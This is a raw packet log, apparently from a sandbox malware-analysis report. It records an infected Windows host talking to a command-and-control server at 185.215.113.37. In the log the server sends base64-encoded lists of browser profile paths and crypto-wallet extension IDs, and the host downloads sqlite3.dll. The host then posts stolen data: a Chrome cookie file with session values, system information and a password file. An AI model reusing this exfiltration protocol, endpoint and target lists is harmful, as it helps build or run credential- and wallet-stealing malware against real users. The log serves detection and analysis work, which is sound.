Oct 14, 2024 01:53:12.366935015 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:12 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 14, 2024 01:53:12.366972923 CEST	124	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxc
Oct 14, 2024 01:53:12.457253933 CEST	388	IN	Data Raw: 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 45 64 59 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d Data Ascii: T3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQcm9kdWN0aW9uc1xQYWxlIE1vb25cUHJvZmlsZXN
Oct 14, 2024 01:53:12.458470106 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIE Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="message"plugins------ECGDHIDAAFHIIDGDBFIE--
Oct 14, 2024 01:53:12.690480947 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:12 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 14, 2024 01:53:12.690499067 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 14, 2024 01:53:12.690511942 CEST	248	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 14, 2024 01:53:12.691067934 CEST	1236	IN	Data Raw: 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d Data Ascii: YW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZ
Oct 14, 2024 01:53:12.691082001 CEST	1236	IN	Data Raw: 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 Data Ascii: bmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGh
Oct 14, 2024 01:53:12.691096067 CEST	248	IN	Data Raw: 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 4a 73 61 33 Data Ascii: Y2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWl
Oct 14, 2024 01:53:12.691159010 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 35 74 62 47 39 70 61 6d 4a 77 62 32 78 6c 61 57 46 74 59 58 77 78 66 44 42 38 4d 48 78 4f 61 57 64 6f 64 47 78 35 49 46 64 68 62 47 78 6c 64 48 Data Ascii: IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXB
Oct 14, 2024 01:53:12.691200018 CEST	668	IN	Data Raw: 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 78 74 61 33 42 6c 5a 32 70 72 59 6d 78 72 61 32 56 6d 59 57 4e 6d 62 6d 31 72 59 57 70 6a 61 6d 31 68 59 6d 6c 71 61 47 4e 73 5a 33 Data Ascii: bWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGV
Oct 14, 2024 01:53:12.692735910 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"fplugins------FCBFBGDBKJKECAAKKFHD--
Oct 14, 2024 01:53:12.924735069 CEST	335	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:12 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 14, 2024 01:53:12.940268993 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC Host: 185.215.113.37 Content-Length: 6971 Connection: Keep-Alive Cache-Control: no-cache
Oct 14, 2024 01:53:12.940291882 CEST	6971	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 14, 2024 01:53:13.676563025 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 14, 2024 01:53:13.897346020 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 14, 2024 01:53:14.126425982 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 14, 2024 01:53:15.498812914 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------IEHJJECBKKECFIEBGCAK--
Oct 14, 2024 01:53:16.240602970 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 14, 2024 01:53:16.313801050 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHC Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="file"------GDGHIDBKJEGIECBGIEHC--
Oct 14, 2024 01:53:17.041425943 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
